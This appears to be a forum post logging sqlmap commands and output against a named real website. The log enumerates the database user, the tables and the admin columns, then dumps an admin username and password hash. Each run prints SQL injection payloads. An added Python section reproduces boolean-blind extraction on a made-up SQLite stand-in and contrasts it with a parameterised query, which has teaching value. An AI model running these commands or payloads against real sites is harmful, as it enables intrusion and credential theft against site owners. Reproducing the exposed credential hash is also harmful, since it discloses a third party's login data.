sqlmap worked example: enumerating a MySQL target

Posted 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the name of the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
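sqlmap reports four techniques for the `id` parameter above and will prefer the UNION and error-based ones, which return data in a single response. The boolean-based blind one (`id=276 AND 799=799` gives the normal page, a false predicate gives a different one) is the fallback that still works when nothing is echoed, and it is the one worth understanding, since it is what the `--current-user`, `--tables`, `--columns` and `--dump` steps reduce to when the faster channels are unavailable. The Python below is an added example, not part of the original post and not sqlmap's own code: it reproduces that extraction loop against a constructed in-memory SQLite stand-in for `article.php?id=` (table and column names copied from the post's `--tables` / `--columns` output, row contents made up; SQLite's `length()` / `substr()` / `unicode()` are assumed as stand-ins for the MySQL `LENGTH()` / `SUBSTRING()` / `ASCII()` that sqlmap would send to the real target), then shows the same probes failing against a parameterised version of the query. It also expands the `CHAR(...)` lists in the UNION payload: `CHAR(58,99,118,120,58)` and `CHAR(58,110,99,118,58)` are the `:cvx:` / `:ncv:` markers sqlmap wraps around a random probe string (`OLeUVieYmA` here) so it can locate the injectable column in the response.

```python
"""Boolean-based blind SQL injection, the 'AND 799=799' technique in the
sqlmap output above, reproduced against a constructed SQLite stand-in for
article.php?id=.  Added example, not part of the original post or of sqlmap."""
import re
import sqlite3
from typing import Callable, Optional

# id parameter -> page body; None stands for the 'false' page or an error page
Page = Callable[[str], Optional[str]]


def build_db() -> sqlite3.Connection:
    """Constructed sample data: table and column names follow the post's
    --tables / --columns output; the row contents are made up."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT,
                            type TEXT, userid TEXT);
        INSERT INTO article VALUES (276, 'Sample article');
        INSERT INTO admin VALUES (1, '5f4dcc3b5aa765d61d8327deb882cf99',
                                  'super', 'editor');
    """)
    return con


CON = build_db()


def vulnerable_article(id_param: str) -> Optional[str]:
    """What article.php?id= does when the parameter is pasted into the query."""
    sql = "SELECT title FROM article WHERE id=" + id_param
    try:
        row = CON.execute(sql).fetchone()
    except sqlite3.Error:
        return None               # SQL error: behaves like the 'false' page
    return row[0] if row else None


def safe_article(id_param: str) -> Optional[str]:
    """Hardened version: reject non-numeric input, then bind the value."""
    if not id_param.isdigit():
        return None
    row = CON.execute("SELECT title FROM article WHERE id=?",
                      (int(id_param),)).fetchone()
    return row[0] if row else None


def injectable(page: Page, base: str = "276") -> bool:
    """sqlmap's boolean test: a true and a false predicate must give different pages."""
    return page(f"{base} AND 799=799") != page(f"{base} AND 799=800")


def blind_extract(page: Page, subquery: str, base: str = "276",
                  max_len: int = 64) -> str:
    """Recover the single value returned by `subquery`, one character at a time,
    using only whether the page comes back 'true' or 'false'.
    SQLite's length()/substr()/unicode() stand in for the MySQL LENGTH()/
    SUBSTRING()/ASCII() calls sqlmap would send to the real target."""
    def true_page(predicate: str) -> bool:
        return page(f"{base} AND {predicate}") is not None

    length = 0                                   # 1) find the length
    while length < max_len and true_page(f"length(({subquery}))>{length}"):
        length += 1

    chars = []                                   # 2) binary-search each character
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if true_page(f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def decode_char_calls(payload: str) -> str:
    """Expand MySQL CHAR(n,n,...) lists in a sqlmap payload into text, which
    reveals the :cvx: / :ncv: markers around sqlmap's random UNION probe string."""
    return re.sub(r"CHAR\(([\d,\s]+)\)",
                  lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")),
                  payload)


if __name__ == "__main__":
    print("vulnerable endpoint injectable:", injectable(vulnerable_article))
    print("userid   :", blind_extract(vulnerable_article, "SELECT userid FROM admin LIMIT 1"))
    print("password :", blind_extract(vulnerable_article, "SELECT password FROM admin LIMIT 1"))
    print("hardened endpoint injectable  :", injectable(safe_article))
    print(decode_char_calls("CONCAT(CHAR(58,99,118,120,58),"
                            "CHAR(79,76,101,85,86,105,101,89,109,65),CHAR(58,110,99,118,58))"))
```

Each character costs about seven true/false requests, which is why sqlmap's session file (the `resuming injection data from session file` lines above) matters: re-running a command replays saved results instead of re-asking the target. Against `safe_article` the true and false probes return the same page, so `injectable()` is false and `blind_extract()` returns an empty string.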